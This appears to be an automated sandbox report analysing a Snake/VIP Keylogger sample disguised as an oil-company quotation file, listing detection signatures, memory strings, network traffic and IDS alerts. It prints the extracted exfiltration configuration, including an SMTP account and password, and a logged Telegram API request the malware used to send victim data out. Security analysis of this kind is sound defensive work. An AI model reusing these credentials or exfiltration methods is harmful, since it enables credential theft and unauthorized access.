Edit tour

Windows Analysis Report
_Company.exe

Overview

General Information

Sample name:	_Company.exe renamed because original name is a hash value
Original sample name:	QTN_Detailed_Schedule_for_Balance_Activities_in_Terminal_5_Area_By_Abu_Dhabi_National_Oil_Company.exe
Analysis ID:	1577705
MD5:	aff56992589dfb76554ea1416c3e99d1
SHA1:	7a3e430720860af04ca1e8d029f60749cd98812b
SHA256:	e5dea0ef10ebb4aa8bb909e2bcbb6efb37b32e3bd9fed8deeed60a3aa6130d06
Tags:	exeuser-Racco42
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

_Company.exe (PID: 6080 cmdline: "C:\Users\user\Desktop\_Company.exe" MD5: AFF56992589DFB76554EA1416C3E99D1)

_Company.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\_Company.exe" MD5: AFF56992589DFB76554EA1416C3E99D1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6dc6b:$x1: In$J$ct0r
00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd06:$a1: get_encryptedPassword 0x2e023:$a2: get_encryptedUsername 0x2db16:$a3: get_timePasswordChanged 0x2dc1f:$a4: get_passwordField 0x2dd1c:$a5: set_encryptedPassword 0x2f3d9:$a7: get_logins 0x2f33c:$a10: KeyLoggerEventArgs 0x2efa1:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x198d16:$a1: get_encryptedPassword 0x1dc746:$a1: get_encryptedPassword 0x21ff66:$a1: get_encryptedPassword 0x199033:$a2: get_encryptedUsername 0x1dca63:$a2: get_encryptedUsername 0x220283:$a2: get_encryptedUsername 0x198b26:$a3: get_timePasswordChanged 0x1dc556:$a3: get_timePasswordChanged 0x21fd76:$a3: get_timePasswordChanged 0x198c2f:$a4: get_passwordField 0x1dc65f:$a4: get_passwordField 0x21fe7f:$a4: get_passwordField 0x198d2c:$a5: set_encryptedPassword 0x1dc75c:$a5: set_encryptedPassword 0x21ff7c:$a5: set_encryptedPassword 0x19a3e9:$a7: get_logins 0x1dde19:$a7: get_logins 0x221639:$a7: get_logins 0x19a34c:$a10: KeyLoggerEventArgs 0x1ddd7c:$a10: KeyLoggerEventArgs 0x22159c:$a10: KeyLoggerEventArgs
Process Memory Space: _Company.exe PID: 6080	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: _Company.exe PID: 6080	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: _Company.exe PID: 6080	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: _Company.exe PID: 6080	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: _Company.exe PID: 6080	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8865c:$a1: get_encryptedPassword 0x888cf:$a2: get_encryptedUsername 0x8848f:$a3: get_timePasswordChanged 0x8857f:$a4: get_passwordField 0x88672:$a5: set_encryptedPassword 0x8a50f:$a7: get_logins 0x8a490:$a10: KeyLoggerEventArgs 0x8a209:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: _Company.exe PID: 7100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: _Company.exe PID: 7100	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: _Company.exe PID: 7100	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: _Company.exe PID: 7100	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbe31f:$a1: get_encryptedPassword 0xbe632:$a2: get_encryptedUsername 0xbe139:$a3: get_timePasswordChanged 0xbe242:$a4: get_passwordField 0xbe335:$a5: set_encryptedPassword 0xc07e5:$a7: get_logins 0xc0748:$a10: KeyLoggerEventArgs 0xc03b1:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2._Company.exe.5760000.7.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6dc6b:$x1: In$J$ct0r
1.2._Company.exe.5760000.7.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6be6b:$x1: In$J$ct0r
1.2._Company.exe.3f4ad70.5.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6be6b:$x1: In$J$ct0r
2.2._Company.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2._Company.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2._Company.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2._Company.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2._Company.exe.4087840.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2._Company.exe.4087840.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2._Company.exe.4087840.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2._Company.exe.4087840.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2._Company.exe.4087840.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2._Company.exe.4087840.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2._Company.exe.4087840.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2._Company.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df06:$a1: get_encryptedPassword 0x2e223:$a2: get_encryptedUsername 0x2dd16:$a3: get_timePasswordChanged 0x2de1f:$a4: get_passwordField 0x2df1c:$a5: set_encryptedPassword 0x2f5d9:$a7: get_logins 0x2f53c:$a10: KeyLoggerEventArgs 0x2f1a1:$a11: KeyLoggerEventArgsEventHandler
1.2._Company.exe.4043e10.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2._Company.exe.4043e10.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2._Company.exe.4043e10.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2._Company.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b658:$a4: \Orbitum\User Data\Default\Login Data 0x3c037:$a5: \Kometa\User Data\Default\Login Data
1.2._Company.exe.4087840.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c106:$a1: get_encryptedPassword 0x2c423:$a2: get_encryptedUsername 0x2bf16:$a3: get_timePasswordChanged 0x2c01f:$a4: get_passwordField 0x2c11c:$a5: set_encryptedPassword 0x2d7d9:$a7: get_logins 0x2d73c:$a10: KeyLoggerEventArgs 0x2d3a1:$a11: KeyLoggerEventArgsEventHandler
1.2._Company.exe.4087840.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df06:$a1: get_encryptedPassword 0x71726:$a1: get_encryptedPassword 0x2e223:$a2: get_encryptedUsername 0x71a43:$a2: get_encryptedUsername 0x2dd16:$a3: get_timePasswordChanged 0x71536:$a3: get_timePasswordChanged 0x2de1f:$a4: get_passwordField 0x7163f:$a4: get_passwordField 0x2df1c:$a5: set_encryptedPassword 0x7173c:$a5: set_encryptedPassword 0x2f5d9:$a7: get_logins 0x72df9:$a7: get_logins 0x2f53c:$a10: KeyLoggerEventArgs 0x72d5c:$a10: KeyLoggerEventArgs 0x2f1a1:$a11: KeyLoggerEventArgsEventHandler 0x729c1:$a11: KeyLoggerEventArgsEventHandler
1.2._Company.exe.4087840.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f578:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ec1b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b658:$a4: \Orbitum\User Data\Default\Login Data 0x7ee78:$a4: \Orbitum\User Data\Default\Login Data 0x3c037:$a5: \Kometa\User Data\Default\Login Data 0x7f857:$a5: \Kometa\User Data\Default\Login Data
2.2._Company.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb33:$s1: UnHook 0x2eb3a:$s2: SetHook 0x2eb42:$s3: CallNextHook 0x2eb4f:$s4: _hook
1.2._Company.exe.4087840.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb33:$s1: UnHook 0x72353:$s1: UnHook 0x2eb3a:$s2: SetHook 0x7235a:$s2: SetHook 0x2eb42:$s3: CallNextHook 0x72362:$s3: CallNextHook 0x2eb4f:$s4: _hook 0x7236f:$s4: _hook
1.2._Company.exe.4087840.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x39858:$a4: \Orbitum\User Data\Default\Login Data 0x3a237:$a5: \Kometa\User Data\Default\Login Data
1.2._Company.exe.4043e10.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c106:$a1: get_encryptedPassword 0x2c423:$a2: get_encryptedUsername 0x2bf16:$a3: get_timePasswordChanged 0x2c01f:$a4: get_passwordField 0x2c11c:$a5: set_encryptedPassword 0x2d7d9:$a7: get_logins 0x2d73c:$a10: KeyLoggerEventArgs 0x2d3a1:$a11: KeyLoggerEventArgsEventHandler
1.2._Company.exe.4087840.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cd33:$s1: UnHook 0x2cd3a:$s2: SetHook 0x2cd42:$s3: CallNextHook 0x2cd4f:$s4: _hook
1.2._Company.exe.4043e10.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x395fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x39858:$a4: \Orbitum\User Data\Default\Login Data 0x3a237:$a5: \Kometa\User Data\Default\Login Data
1.2._Company.exe.4043e10.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cd33:$s1: UnHook 0x2cd3a:$s2: SetHook 0x2cd42:$s3: CallNextHook 0x2cd4f:$s4: _hook
1.2._Company.exe.4043e10.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2._Company.exe.4043e10.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2._Company.exe.4043e10.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2._Company.exe.4043e10.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2._Company.exe.4043e10.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df06:$a1: get_encryptedPassword 0x71936:$a1: get_encryptedPassword 0xb5156:$a1: get_encryptedPassword 0x2e223:$a2: get_encryptedUsername 0x71c53:$a2: get_encryptedUsername 0xb5473:$a2: get_encryptedUsername 0x2dd16:$a3: get_timePasswordChanged 0x71746:$a3: get_timePasswordChanged 0xb4f66:$a3: get_timePasswordChanged 0x2de1f:$a4: get_passwordField 0x7184f:$a4: get_passwordField 0xb506f:$a4: get_passwordField 0x2df1c:$a5: set_encryptedPassword 0x7194c:$a5: set_encryptedPassword 0xb516c:$a5: set_encryptedPassword 0x2f5d9:$a7: get_logins 0x73009:$a7: get_logins 0xb6829:$a7: get_logins 0x2f53c:$a10: KeyLoggerEventArgs 0x72f6c:$a10: KeyLoggerEventArgs 0xb678c:$a10: KeyLoggerEventArgs
1.2._Company.exe.4043e10.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f788:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc2fa8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ee2b:$a3: \Google\Chrome\User Data\Default\Login Data 0xc264b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b658:$a4: \Orbitum\User Data\Default\Login Data 0x7f088:$a4: \Orbitum\User Data\Default\Login Data 0xc28a8:$a4: \Orbitum\User Data\Default\Login Data 0x3c037:$a5: \Kometa\User Data\Default\Login Data 0x7fa67:$a5: \Kometa\User Data\Default\Login Data 0xc3287:$a5: \Kometa\User Data\Default\Login Data
1.2._Company.exe.4043e10.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb33:$s1: UnHook 0x72563:$s1: UnHook 0xb5d83:$s1: UnHook 0x2eb3a:$s2: SetHook 0x7256a:$s2: SetHook 0xb5d8a:$s2: SetHook 0x2eb42:$s3: CallNextHook 0x72572:$s3: CallNextHook 0xb5d92:$s3: CallNextHook 0x2eb4f:$s4: _hook 0x7257f:$s4: _hook 0xb5d9f:$s4: _hook
1.2._Company.exe.3f4ad70.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2._Company.exe.3f4ad70.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2._Company.exe.3f4ad70.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2._Company.exe.3f4ad70.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2._Company.exe.3f4ad70.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x126fa6:$a1: get_encryptedPassword 0x16a9d6:$a1: get_encryptedPassword 0x1ae1f6:$a1: get_encryptedPassword 0x1272c3:$a2: get_encryptedUsername 0x16acf3:$a2: get_encryptedUsername 0x1ae513:$a2: get_encryptedUsername 0x126db6:$a3: get_timePasswordChanged 0x16a7e6:$a3: get_timePasswordChanged 0x1ae006:$a3: get_timePasswordChanged 0x126ebf:$a4: get_passwordField 0x16a8ef:$a4: get_passwordField 0x1ae10f:$a4: get_passwordField 0x126fbc:$a5: set_encryptedPassword 0x16a9ec:$a5: set_encryptedPassword 0x1ae20c:$a5: set_encryptedPassword 0x128679:$a7: get_logins 0x16c0a9:$a7: get_logins 0x1af8c9:$a7: get_logins 0x1285dc:$a10: KeyLoggerEventArgs 0x16c00c:$a10: KeyLoggerEventArgs 0x1af82c:$a10: KeyLoggerEventArgs
1.2._Company.exe.3f4ad70.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x127bd3:$s1: UnHook 0x16b603:$s1: UnHook 0x1aee23:$s1: UnHook 0x127bda:$s2: SetHook 0x16b60a:$s2: SetHook 0x1aee2a:$s2: SetHook 0x127be2:$s3: CallNextHook 0x16b612:$s3: CallNextHook 0x1aee32:$s3: CallNextHook 0x127bef:$s4: _hook 0x16b61f:$s4: _hook 0x1aee3f:$s4: _hook
1.2._Company.exe.3f4ad70.5.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6dc6b:$x1: In$J$ct0r
1.2._Company.exe.2ef4340.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x2c2b8:$x1: In$J$ct0r 0x2d1c8:$a1: WriteProcessMemory 0x2d254:$a1: WriteProcessMemory 0x2d328:$a4: VirtualAllocEx 0x2d54c:$a4: VirtualAllocEx 0x2d5d8:$a4: VirtualAllocEx
Click to see the 39 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.65.255.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\_Company.exe, Initiated: true, ProcessId: 7100, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49824

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T17:07:21.982022+0100	2803305	3	Unknown Traffic	192.168.2.6	49728	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T17:07:17.949510+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49716	158.101.44.242	80	TCP
2024-12-18T17:07:20.230737+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49716	158.101.44.242	80	TCP
2024-12-18T17:07:23.371363+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49736	158.101.44.242	80	TCP
2024-12-18T17:07:26.402613+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49747	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: _Company.exe

Avira: detected

Found malware configuration

Source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}
Source: 2.2._Company.exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: _Company.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: _Company.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: _Company.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49724 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49803 version: TLS 1.2

Source: _Company.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: _Company.exe, 00000001.00000002.4647497521.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000001.00000002.4650749475.0000000005610000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0139FC19h	2_2_0139F961
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0139F45Dh	2_2_0139F2C0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0139F45Dh	2_2_0139F4AC
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 05562C19h	2_2_05562968
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 055631E0h	2_2_05562DC8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 05560D0Dh	2_2_05560B30
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 05561697h	2_2_05560B30
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556D7F9h	2_2_0556D550
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 055631E0h	2_2_0556310E
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556DC51h	2_2_0556D9A8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_05560853
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_05560040
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556FAB9h	2_2_0556F810
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556D3A1h	2_2_0556D0F8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556CF49h	2_2_0556CCA0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556F209h	2_2_0556EF60
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556EDB1h	2_2_0556EB08
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556F661h	2_2_0556F3B8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556E501h	2_2_0556E258
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_05560673
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556E0A9h	2_2_0556DE00
Source: C:\Users\user\Desktop\_Company.exe	Code function: 4x nop then jmp 0556E959h	2_2_0556E6B0

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49736 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49747 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
